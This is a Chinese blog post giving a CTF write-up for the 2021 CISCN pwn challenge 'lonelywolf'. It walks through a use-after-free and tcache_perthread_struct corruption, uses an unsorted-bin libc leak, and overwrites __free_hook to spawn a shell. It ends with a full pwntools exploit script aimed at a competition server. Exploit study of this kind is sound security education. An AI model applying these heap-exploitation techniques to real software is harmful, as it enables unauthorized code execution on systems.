2021-ciscn-pwn-lonlywolf复现

最新推荐文章于 2021-08-30 09:06:52 发布
最新推荐文章于 2021-08-30 09:06:52 发布
阅读量615 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45209963/article/details/117637485
版权

Lonlywolf

国赛题难度可以…先爬了 做的复现…
这里使用的exp是nuoye大佬的版本 先膜一波
在这里插入图片描述
主函数没什么特殊的 add/del/print/edit都有
在这里插入图片描述
add要求小于0x78(120),而且只保存了当前拿到的chunk地址
在这里插入图片描述
free有典型的UAF
在这里插入图片描述
edit正常 没有off by null 遇’\n’停止。
在这里插入图片描述
print也正常。

下面来说说做法

这题麻烦的是手里只有一个地址 leak完了不方便攻击 直接攻击又没有地址
nuoye大佬的做法是tcache perthread corruption + chunkoverlap
修改tcache_perthread_struct结构体 伪造chunk个数 同时伪造chunk大小 然后free出
unsorted bin来进行leak
tcache_perthread_struct结构体是tcache里面的重要结构体(实际上也很大程度方便了攻击者)
如图所示
在这里插入图片描述

结构体改造

这里先add一个chunk free后置0再free(直接double free 会崩但不报错) 就拿到了堆地址
然后把这个chunk的fd改成tcache_perthread_struct结构体地址 两次add拿到该地址
在再edit将0x90的chunk数改成8(为unsorted bins做准备)
0x70、0x80的chunk数改成1 (不然不能按bins头拿而是会从top chunk割)
再将0x50-0x70的bins头 改成heapbase+0x250 (使后面拿chunk的地址一致)
(正好在tcache_perthread_struct结构体后面)
0x80的bins头改成heapbase+0x260 对应正常情况下的unsorted bins 指针位置

unsorted bins伪造

然后拿0x70的chunk,伪造chunksize为0x90
再拿0x40的chunk 这个会直接从top chunk上面割 所以位置就在上一个chunk后面
在里面伪造0x90后面的chunk 大小为0x30 (chunk overlap)
拿0x80的chunk 再free 因为这时的chunkszie 为0x90
而tcache_perthread_struct里面的chunk数满了 所以会被释放到unsorted bin里面去
直接print leak出地址

攻击

拿个0x30的chunk UAF改fd为__free_hook-8
add两次拿到地址 写成’/bin/sh\x00’+p64(libc.sym[‘system’])
再free就get shell了(free_hook改成了system free参数又是/bin/sh 一石二鸟)

总结

题目有漏洞但不太容易。不光是对tcache_perthread_struct结构体的了解,
更重要的是在只有一个指针时操纵chunk还得保证不出现指针紊乱。
通过伪造chunk个数与头指针,就可以保证按不同大小malloc时获取到所需不同地址。

最后附大佬的exp

from pwn import *
p = process("lonelywolf")
context.log_level = 'debug'
p = remote("124.71.230.240","26077")
libc = ELF("lonelywolf").libc
def add(size):
	p.recvuntil("Your choice: ")
	p.sendline("1")
	p.recvuntil("Index: ")
	p.sendline(str(0))
	p.recvuntil("Size: ")
	p.sendline(str(size))
def edit(data):
	p.recvuntil("Your choice: ")
	p.sendline("2")
	p.recvuntil("Index: ")
	p.sendline(str(0))
	p.recvuntil("Content: ")
	p.send(data)
def show():
	p.recvuntil("Your choice: ")
	p.sendline("3")
	p.recvuntil("Index: ")
	p.sendline(str(0))
def free():
	p.recvuntil("Your choice: ")
	p.sendline("4")
	p.recvuntil("Index: ")
	p.sendline(str(0))
add(0x78)
free()
edit('\x00'*0x10+'\n')
free()
show()
p.recvuntil("Content: ")
heap = u64(p.recv(6)+'\x00\x00')-0x260
print hex(heap)
edit(p64(heap+0x10)+'\n')
add(0x78)
add(0x78)
edit(p32(0)+'\x00\x01\x01\x08'+p64(0)*10+p64(heap+0x250)*3+p64(heap+0x260)) 
'''这里前面可以用\x00\x00\x01\x08 因为0x50的chunk实际上没有用'''
add(0x68) #0x70
edit(p64(0)+p64(0x91)+p64(0)+'\n')
add(0x38) '''0x40的chunk之前根本没有 直接从top chunk上面割自然就在0x70的后面了'''
edit('\x00'*0x8+p64(0x31)+'\n')
add(0x78)
free()
show()
p.recvuntil("Content: ")
libc.address = u64(p.recv(6)+'\x00\x00')-0x3ebca0
print hex(libc.address)
add(0x28)
free()
edit(p64(libc.sym['__free_hook']-8)+'\n')
add(0x28)
add(0x28)
edit('/bin/sh\x00'+p64(libc.sym['system'])+'\n')
free()
#gdb.attach(p)
p.interactive()
xyzmpv
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_pwn_lonlywolf
Torebtr的博客
05-22 429
ciscn复现 太菜了,比赛的时候啥也不会,还要肝材料,写到两点,网速也差到爆,实在写不下去了,队友去hw了,分区赛也没进,好好复现,争取下次取得好成绩吧。。。。。 文章目录**ciscn复现****pwn**:*ciscn_2021_lonelywolf*函数分析1、allocate**2、edit函数****3、show****4、delete**解题思路:exp: pwnciscn_2021_lonelywolf 函数分析 题目整体来说不难,常规菜单题,然后进行函数分析(函数已重命名)。而且给了l
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn_2021_lonelywolf.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 866
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc地
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 229
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1503
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 724
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1327
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
glibc2.29堆溢出tcache的利用方式及原理
Hello World.c
03-06 8137
ibc2.29 堆溢出tcache的利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1155
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 837
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
BUUCTF刷题2
m0_51251108的博客
05-22 374
gyctf_2020_borrowstack: 关键词:栈迁移 使用可控制的地址覆盖ebp的值,使用leave;ret指令所在地址覆盖ret的值,迁移后要填充4或8 read的时候用send 这题首先注意: 1.bss段离plt,got很近,要适当抬高迁移的位置 3.用system拿,估计还得要栈迁移,麻烦,用og简单, from pwn import* r=remote('node3.buuoj.cn',26005) #r=process('./gyctf_2020_borrowstack') conte
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值